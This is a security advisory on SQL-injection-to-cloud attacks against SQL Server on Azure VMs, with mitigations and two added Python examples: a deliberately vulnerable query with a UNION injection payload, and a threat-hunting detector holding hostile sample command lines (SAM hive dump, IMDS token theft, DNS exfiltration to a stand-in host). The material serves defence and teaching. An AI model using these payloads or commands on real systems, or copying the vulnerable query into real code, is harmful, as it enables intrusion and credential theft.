Ongoing Attacks Against Microsoft Azure Cloud Virtual Machines
9 October 2023
Microsoft has reported attackers attempting to gain access to cloud environments by exploiting SQL injection in applications backed by Microsoft SQL Server instances hosted on Azure virtual machines, and then using the virtual machine's cloud identity to move towards other cloud resources.
The modus operandi of the attacks includes, but is not limited to:
Initial Access: Performing an SQL injection attack against an application backed by a vulnerable Microsoft SQL Server instance
Data Collection: Collecting sensitive information such as database details and the permissions held by the compromised database user
Execution: Enabling and invoking the 'xp_cmdshell' stored procedure to run operating system commands through SQL, which gives the attacker a shell on the host
Persistence: Creating scheduled tasks
Exfiltration: Retrieving data using a webhook service and DNS tunnelling
Credential Access: Dumping registry hives such as the Security Accounts Manager (SAM) and SECURITY hives
Lateral Movement: Querying the Instance Metadata Service (IMDS) to retrieve the virtual machine's cloud identity token and using it to access other cloud resources
Defense Evasion: Removing any downloaded scripts and reverting modifications made to temporary databases
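The initial-access step of the chain above, as an added example that is not code from the advisory or from Microsoft's report: a lookup that pastes user input into SQL text, beside the parameterised form that closes the hole. The schema, table names and attacker string are constructed for illustration; sqlite3 from the Python standard library stands in for SQL Server so the block runs offline, and the '?' placeholder style shown is the same one pyodbc uses against SQL Server.

```python
"""Added example (not code from the advisory or from Microsoft's report): the
SQL injection that gives initial access, beside the parameterised query that
closes it. The schema, table names and attacker string are constructed for
illustration; sqlite3 from the standard library stands in for SQL Server so the
block runs offline. The '?' placeholder style is the one pyodbc uses for SQL Server."""
import sqlite3

# Constructed sample data: the table the order-lookup page is meant to read, and a
# second table the page should never expose.
SCHEMA = """
CREATE TABLE orders(id INTEGER PRIMARY KEY, customer TEXT, total REAL);
CREATE TABLE app_users(name TEXT, password_hash TEXT, is_admin INTEGER);
INSERT INTO orders VALUES (1, 'alice', 10.0), (2, 'bob', 25.5);
INSERT INTO app_users VALUES ('admin', 'sha256$aa11', 1), ('svc_report', 'sha256$bb22', 0);
"""


def fresh_db():
    """In-memory database loaded with the constructed schema."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def lookup_orders_vulnerable(conn, customer):
    """Deliberately vulnerable: user input is pasted into the SQL text, so quote
    characters in it become SQL syntax."""
    sql = f"SELECT id, customer, total FROM orders WHERE customer = '{customer}'"
    return conn.execute(sql).fetchall()


def lookup_orders_safe(conn, customer):
    """Hardened: the value is bound as a parameter and can only ever be data."""
    sql = "SELECT id, customer, total FROM orders WHERE customer = ?"
    return conn.execute(sql, (customer,)).fetchall()


# Constructed attacker input. It closes the string literal, appends a UNION that
# reads a table the page never queries, and comments out the trailing quote.
# This is the reconnaissance step of the chain described above; against SQL
# Server the same technique is used to read permissions and server metadata
# before the attacker tries to enable xp_cmdshell.
PAYLOAD = "x' UNION SELECT rowid, name, is_admin FROM app_users --"


def demo():
    """Run both lookups with a normal value and with the payload."""
    conn = fresh_db()
    return {
        "normal": lookup_orders_safe(conn, "alice"),
        "vulnerable_with_payload": lookup_orders_vulnerable(conn, PAYLOAD),
        "safe_with_payload": lookup_orders_safe(conn, PAYLOAD),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

With the payload, the vulnerable lookup returns the contents of app_users; the parameterised lookup returns nothing, because the whole string is compared as a customer name. The same payload shape is what reads server metadata and permissions on a real SQL Server before xp_cmdshell comes into play.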
Users and administrators are advised to stay vigilant and adopt the following measures to defend against such attacks:
Apply Principle of Least Privilege
Grant users, processes and systems only the access rights and permissions their roles require. In particular, the database account an application connects with should not hold server-level roles such as sysadmin, since that level of privilege is what allows xp_cmdshell to be enabled and run.
Enforce Input Sanitisation
Validate and sanitise all user input, and use parameterised queries, to mitigate threats such as SQL injection and cross-site scripting attacks.
Perform Threat Hunting
Use reputable threat hunting tools to detect threats proactively and improve the security posture of the system. Such tools can run queries that detect the SQL Server process (sqlservr.exe) spawning a shell to execute one or more suspicious commands.
Use Cloud-Native Application Protection Platform (CNAPP)
A CNAPP streamlines the monitoring, identification of and response to cloud security risks and weaknesses. It allows users and administrators to identify and address potential vulnerabilities in their databases, and can also detect suspicious activity such as lateral movement.
Deploy Endpoint Detection and Response (EDR)
Deploy EDR to prevent, identify, investigate and respond to sophisticated threats such as the abuse of the 'xp_cmdshell' command following SQL injection.
Authenticate All Users
Require every user and service that connects to the database to authenticate, so that its identity can be verified and its actions attributed.
Update Systems and Servers Promptly
Users and administrators are advised to update their systems and servers to the latest version.
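The threat-hunting check recommended above, as an added example that is not Microsoft's hunting query and not code from the advisory: it runs over constructed process-creation records (field names follow Sysmon Event ID 1; every host name, path and command line is made up), flags any shell spawned by sqlservr.exe, and tags each one with the stage of the chain its command line matches.

```python
"""Added example (not Microsoft's hunting query and not code from the advisory):
the threat-hunting check described above, run over constructed process-creation
records. The record fields follow Sysmon Event ID 1 naming, but every host name,
path and command line below is made up for illustration."""
import ntpath
import re

# Shells that xp_cmdshell launches as children of the SQL Server service process.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# Child-process behaviours that line up with the stages of the chain in the
# advisory. Each entry is a "<stage>: <detail>" label and a case-insensitive
# regex evaluated over the full command line.
INDICATORS = [
    ("persistence: scheduled task creation", r"\bschtasks(\.exe)?\b.*\s/create\b"),
    ("credential access: SAM/SECURITY hive dump", r"\breg(\.exe)?\s+save\s+hklm\\(sam|security)\b"),
    ("lateral movement: IMDS token request", r"169\.254\.169\.254.*(oauth2|identity)"),
    ("exfiltration: DNS tunnelling", r"\bnslookup(\.exe)?\b.*[a-f0-9]{16,}\."),
    ("exfiltration: webhook upload", r"(invoke-webrequest|curl|wget)\b.*https?://\S*webhook"),
    ("defence evasion: script cleanup", r"\b(del|remove-item|rm)\b.*\.(ps1|bat|vbs)\b"),
]

SQL_BIN = r"C:\Program Files\Microsoft SQL Server\MSSQL16.MSSQLSERVER\MSSQL\Binn"
SYS32 = r"C:\Windows\System32"

# Constructed events. The last two are controls: a shell spawned by a parent that
# is not SQL Server, and a non-shell child of SQL Server; neither should fire.
EVENTS = [
    {"Computer": "sqlvm01", "ParentImage": SQL_BIN + r"\sqlservr.exe",
     "Image": SYS32 + r"\cmd.exe", "CommandLine": r'cmd.exe /c "whoami /priv"'},
    {"Computer": "sqlvm01", "ParentImage": SQL_BIN + r"\sqlservr.exe",
     "Image": SYS32 + r"\cmd.exe",
     "CommandLine": r"cmd.exe /c schtasks /create /tn Updater /tr C:\Windows\Temp\u.bat /sc minute"},
    {"Computer": "sqlvm01", "ParentImage": SQL_BIN + r"\sqlservr.exe",
     "Image": SYS32 + r"\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -c \"Invoke-RestMethod -Headers @{Metadata='true'} "
                    "-Uri http://169.254.169.254/metadata/identity/oauth2/token?resource=https://management.azure.com/\""},
    {"Computer": "sqlvm01", "ParentImage": SQL_BIN + r"\sqlservr.exe",
     "Image": SYS32 + r"\cmd.exe", "CommandLine": r"cmd.exe /c reg save hklm\sam C:\Windows\Temp\sam.hiv"},
    {"Computer": "sqlvm01", "ParentImage": SQL_BIN + r"\sqlservr.exe",
     "Image": SYS32 + r"\cmd.exe", "CommandLine": "cmd.exe /c nslookup 4a7b9c1d2e3f40516273.exfil.example"},
    {"Computer": "sqlvm01", "ParentImage": SQL_BIN + r"\sqlservr.exe",
     "Image": SYS32 + r"\cmd.exe", "CommandLine": r"cmd.exe /c del C:\Windows\Temp\u.bat"},
    {"Computer": "sqlvm01", "ParentImage": SYS32 + r"\services.exe",
     "Image": SYS32 + r"\cmd.exe", "CommandLine": "cmd.exe /c schtasks /create /tn Backup /tr backup.exe /sc daily"},
    {"Computer": "sqlvm01", "ParentImage": SQL_BIN + r"\sqlservr.exe",
     "Image": SQL_BIN + r"\SQLAGENT.EXE", "CommandLine": "SQLAGENT.EXE -i MSSQLSERVER"},
]


def hunt(events):
    """One finding for every shell that SQL Server spawned, tagged with the
    indicators its command line matched. An empty indicator list still counts:
    a shell under sqlservr.exe is abnormal on its own."""
    findings = []
    for ev in events:
        if ntpath.basename(ev["ParentImage"]).lower() != "sqlservr.exe":
            continue
        if ntpath.basename(ev["Image"]).lower() not in SHELLS:
            continue
        cmd = ev["CommandLine"]
        hits = [label for label, pat in INDICATORS if re.search(pat, cmd, re.IGNORECASE)]
        findings.append({"host": ev["Computer"], "cmdline": cmd, "indicators": hits})
    return findings


def stages_by_host(findings):
    """Collapse findings to the set of attack stages seen on each host."""
    stages = {}
    for f in findings:
        for label in f["indicators"]:
            stages.setdefault(f["host"], set()).add(label.split(":")[0])
    return stages


def hosts_to_escalate(findings, min_stages=3):
    """Hosts where enough distinct stages were seen to treat the activity as an
    intrusion rather than a one-off admin command (the threshold is an assumption)."""
    return sorted(h for h, s in stages_by_host(findings).items() if len(s) >= min_stages)


if __name__ == "__main__":
    for f in hunt(EVENTS):
        print(f["host"], f["indicators"] or ["shell under sqlservr.exe, no further match"], f["cmdline"])
    print("escalate:", hosts_to_escalate(hunt(EVENTS)))
```

The parent/child filter is the actual detection; the indicator regexes only classify what the shell did, which is why an unmatched shell is still reported. In a production query the same logic runs over the EDR's process telemetry, and the regex list is tuned to the environment's legitimate SQL Agent and maintenance jobs.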
For more information on securing Application Programming Interfaces, please refer to our advisory here.
More information is available here:
https://www.bleepingcomputer.com/news/security/microsoft-hackers-target-azure-cloud-vms-via-breached-sql-servers/?mibextid=Zxz2cZ
https://www.microsoft.com/en-us/security/blog/2023/10/03/defending-new-vectors-threat-actors-attempt-sql-server-to-cloud-lateral-movement/